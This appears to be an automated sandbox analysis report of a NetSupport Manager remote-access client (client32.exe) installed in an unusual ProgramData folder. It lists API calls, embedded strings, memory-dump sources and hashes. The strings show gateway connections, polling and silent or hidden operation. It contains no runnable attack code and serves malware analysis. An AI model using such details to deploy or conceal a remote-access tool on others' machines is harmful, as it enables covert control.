                                                                                                • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$445817$C:\ProgramData\i99ekubc\Support\$C:\ProgramData\i99ekubc\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                • API String ID: 3160247386-3641689268
                                                                                                • Opcode ID: 47459139e04d9257851be2a8d456fafedf8dd6c698d21500f71969a6ea33eba0
                                                                                                • Instruction ID: 86ce0dcd702fc042ddfc2814c493e0d8270ffdc890029659ac0374cfab906563
                                                                                                • Opcode Fuzzy Hash: 47459139e04d9257851be2a8d456fafedf8dd6c698d21500f71969a6ea33eba0
                                                                                                • Instruction Fuzzy Hash: 4CD1D5F59003446FEB10DF34AC81B1A7BA8BB0A34CB84D479F709E7A41F77598499BA1
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C,?,00000000,?,1104C49F), ref: 1111C9E2
                                                                                                • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1111C9F8
                                                                                                • SystemParametersInfoA.USER32(00000026,00000000,0212FBE0,00000000), ref: 1111CA0A
                                                                                                • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1111CA60
                                                                                                • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1111CA75
                                                                                                • SystemParametersInfoA.USER32(00001002,00000000,0212FBF0,00000000), ref: 1111CAD9
                                                                                                • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1111CB1F
                                                                                                • SystemParametersInfoA.USER32(00001004,00000000,0212FBE8,00000000), ref: 1111CB37
                                                                                                • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1111CB7D
                                                                                                • SystemParametersInfoA.USER32(00001006,00000000,0212FBEC,00000000), ref: 1111CB95
                                                                                                • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1111CBDB
                                                                                                • SystemParametersInfoA.USER32(0000101A,00000000,0212FBF4,00000000), ref: 1111CBF3
                                                                                                • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1111CC39
                                                                                                • SystemParametersInfoA.USER32(00001014,00000000,0212FBF8,00000000), ref: 1111CC51
                                                                                                • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1111CC97
                                                                                                • SystemParametersInfoA.USER32(00001016,00000000,0212FBFC,00000000), ref: 1111CCAF
                                                                                                • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1111CCF5
                                                                                                • SystemParametersInfoA.USER32(00001024,00000000,0212FC00,00000000), ref: 1111CD0D
                                                                                                • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1111CDBF
                                                                                                • SystemParametersInfoA.USER32(00001008,00000000,0212FC08,00000000), ref: 1111CDD7
                                                                                                • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1111CE1A
                                                                                                • SystemParametersInfoA.USER32(0000004A,00000000,0212FC0C,00000000), ref: 1111CE2F
                                                                                                • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1111CAC1
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: System$InfoParameters$Metrics__wcstoi64
                                                                                                • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                                                                • API String ID: 3799663137-3751266815
                                                                                                • Opcode ID: e3688bc42a37d2216d756e178c68f462f9839354e24246aecb4cea1edeb831f9
                                                                                                • Instruction ID: bf678e33c67380cbbf5bb6d1fd1adca19844daef576a9ba588db8e9803c6ea1e
                                                                                                • Opcode Fuzzy Hash: e3688bc42a37d2216d756e178c68f462f9839354e24246aecb4cea1edeb831f9
                                                                                                • Instruction Fuzzy Hash: 2612A631600B42AAF720CF76CE44FABFBB5EB84B44F40442CA5469E5C8DAB4F441C799
                                                                                                APIs
                                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                • API String ID: 716802716-1571441106
                                                                                                • Opcode ID: 8126f7cd9e3a1b402a01001153baca8519216a1c208268375f46667bbc0d5a8d
                                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                • Opcode Fuzzy Hash: 8126f7cd9e3a1b402a01001153baca8519216a1c208268375f46667bbc0d5a8d
                                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5840: inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,00000000), ref: 69CEAA11
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA58
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA68
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CEAA94
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 69CEAB0B
                                                                                                • socket.WSOCK32(00000002,00000001,00000000), ref: 69CEAB4E
                                                                                                • WSAGetLastError.WSOCK32(?,00000000,00000000), ref: 69CEAB5A
                                                                                                • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,?,00000000,00000000), ref: 69CEAB8E
                                                                                                • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,?,00000000,00000000), ref: 69CEABB1
                                                                                                • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00001001,?,00000004,?,00000000,00000000), ref: 69CEABE3
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 69CEAC18
                                                                                                • WSAGetLastError.WSOCK32(00001001,?,00000004,?,00000000,00000000), ref: 69CEAC21
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAC29
                                                                                                • htons.WSOCK32(00000000), ref: 69CEAC65
                                                                                                • WSASetBlockingHook.WSOCK32(69CE63A0), ref: 69CEAC76
                                                                                                • WSAGetLastError.WSOCK32(?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAC8F
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAC96
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAC9C
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,?,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEACFD
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAD04
                                                                                                • closesocket.WSOCK32(00000000), ref: 69CEAD0A
                                                                                                • WSAUnhookBlockingHook.WSOCK32 ref: 69CEAD45
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAD4F
                                                                                                • InitializeCriticalSection.KERNEL32(-69D2CB4A,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEADE6
                                                                                                  • Part of subcall function 69CE8FB0: _memset.LIBCMT ref: 69CE8FE4
                                                                                                  • Part of subcall function 69CE8FB0: getsockname.WSOCK32(?,?,00000010), ref: 69CE9005
                                                                                                • getsockname.WSOCK32(00000000,?,?), ref: 69CEAE4B
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE60
                                                                                                • GetTickCount.KERNEL32(?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE6C
                                                                                                • InterlockedExchange.KERNEL32(?,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69CEAE7A
                                                                                                Strings
                                                                                                • Connect error to %s using hijacked socket, error %d, xrefs: 69CEAB17
                                                                                                • Cannot connect to gateway %s via web proxy, error %d, xrefs: 69CEAD14
                                                                                                • *TcpNoDelay, xrefs: 69CEABB8
                                                                                                • Cannot connect to gateway %s, error %d, xrefs: 69CEACA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                • API String ID: 692187944-2561115898
                                                                                                • Opcode ID: 68569787c06ed6f39036a6055574ca85d8847a1d5457bb618e894b12ce2e2656
                                                                                                • Instruction ID: 803e11d087f955adb808fbeb7dbd159d4c6163bc166a56918d40aef609b92c16
                                                                                                • Opcode Fuzzy Hash: 68569787c06ed6f39036a6055574ca85d8847a1d5457bb618e894b12ce2e2656
                                                                                                • Instruction Fuzzy Hash: 08E19275A002199FEB14DF54D951B9DB3B5FF89314F0081BAEA0EA7280EB709E44CFA1

                                                                                                Control-flow Graph

                                                                                                • [Graph not reproduced: control-flow graph for the code starting at 11139ED0; node legend: Executed / Not Executed]
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32(986DAFD2), ref: 11139F07
                                                                                                • IsWindow.USER32(000103BC), ref: 11139F65
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139F73
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139FAB
                                                                                                • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139FE0
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139FFC
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                                • FindWindowA.USER32 ref: 1113A049
                                                                                                • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 1113A088
                                                                                                • IsIconic.USER32(000103BC), ref: 1113A095
                                                                                                • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,00000000), ref: 11132144
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,11139EA2), ref: 11132156
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 1113A0D4
                                                                                                • GetLastError.KERNEL32 ref: 1113A193
                                                                                                • GetLastError.KERNEL32 ref: 1113A20B
                                                                                                • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                                • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                                  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110261A8
                                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                • API String ID: 2511061093-2542869446
                                                                                                • Opcode ID: 11f57b09c411c6798b09f472ff6fcec20de9d11e43146a182cae43b50b987b2a
                                                                                                • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                                • Opcode Fuzzy Hash: 11f57b09c411c6798b09f472ff6fcec20de9d11e43146a182cae43b50b987b2a
                                                                                                • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

                                                                                                Control-flow Graph

                                                                                                • [Graph not reproduced: control-flow graph for the code starting at 11134830; node legend: Executed / Not Executed]
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,986DAFD2), ref: 1113489E
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                                • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                                • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                                • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                • API String ID: 263027137-1001504656
                                                                                                • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                                • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                                APIs
                                                                                                • #16.WSOCK32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE924C
                                                                                                • WSAGetLastError.WSOCK32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE925B
                                                                                                • GetTickCount.KERNEL32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE9274
                                                                                                • Sleep.KERNEL32(00000001,00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE92A8
                                                                                                • GetTickCount.KERNEL32(00000000,009686C7,69CF3361,00000000,00000000,69CF3361,00000007), ref: 69CE92B0
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CE92BC
                                                                                                Strings
                                                                                                • ReadSocket - Error %d reading response, xrefs: 69CE92F7
                                                                                                • *RecvTimeout, xrefs: 69CE927B
                                                                                                • ReadSocket - Would block, xrefs: 69CE928A
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 69CE9226
                                                                                                • ReadSocket - Connection has been closed by peer, xrefs: 69CE92E0
                                                                                                • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 69CE922B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountSleepTick$ErrorLast
                                                                                                • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                • API String ID: 2495545493-2497412063
                                                                                                APIs
                                                                                                • GetSystemTime.KERNEL32(?,?,?,962D354D,986B9CC5,962D34B3,FFFFFFFF,00000000), ref: 69CF31E2
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,69D1ECB0), ref: 69CF31EC
                                                                                                • GetSystemTime.KERNEL32(?,986B9CC5,962D34B3,FFFFFFFF,00000000), ref: 69CF322A
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,69D1ECB0), ref: 69CF3234
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,962D354D), ref: 69CF32BE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 69CF32D3
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 69CF334D
                                                                                                  • Part of subcall function 69CFBA20: __strdup.LIBCMT ref: 69CFBA3A
                                                                                                  • Part of subcall function 69CFBB00: _free.LIBCMT ref: 69CFBB2D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                • API String ID: 1510130979-3441452530
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000), ref: 111168EF
                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 11116914
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings,?,00000000,Client,silent,00000000,00000000), ref: 11116926
                                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                                • CoUninitialize.OLE32 ref: 111169E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                • API String ID: 4195908086-2348320231
                                                                                                APIs
                                                                                                  • Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                                  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                • _memset.LIBCMT ref: 11146055
                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                • API String ID: 4251163631-545709139
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • API ID: _memset
                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                • API String ID: 2102423945-35127696
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 110317A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • API ID: ExceptionFilterUnhandled
